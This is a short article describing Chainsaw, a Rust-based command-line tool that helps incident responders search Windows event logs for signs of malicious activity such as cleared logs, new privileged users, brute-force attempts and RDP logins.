Chainsaw tool is designed to assist in the first-response stage of a security engagement and can also help blue teams triage entries relevant for the investigation through Windows event log records.
Windows event logs are a ledger of the system’s activities, comprising details about applications and user logins. Forensic investigators rely on these records, sometimes as the main source of evidence, to create a timeline of events of interest.
The difficulty with checking these records is that there’s a lot of them, especially on systems with a high logging level; sifting through for relevant information can and can be a time-consuming task.Chainsaw is a Rust-based command-line utility that can go through event logs to highlight suspicious entries or strings that may indicate a threat.
Chainsaw is a Rust-based command-line utility that can go through event logs to highlight suspicious entries or strings that may indicate a threat. It contains built-in logic for detection use-cases that are not suitable for Sigma rules, and provides a simple interface to search through event logs by keyword, regex pattern, or for specific event IDs.
Threat hunters and incident responders can use Chainsaw’s search features to extract from Windows logs information pertinent to malicious activity.
Chainsaw uses the EVTX parser library and the detection logic matching provided by F-Secure Countercept’s TAU Engine library. It can output the results in ASCII table, CSV, or JSON.
Users can use the tool to do the following:
- Search through event logs by event ID, keyword, and regex patterns
- Extract and parse Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
- Detect key event logs being cleared or the event log service being stopped
- Detect users being created or added to sensitive user groups
- Brute-force of local user accounts
- RDP logins, network logins etc.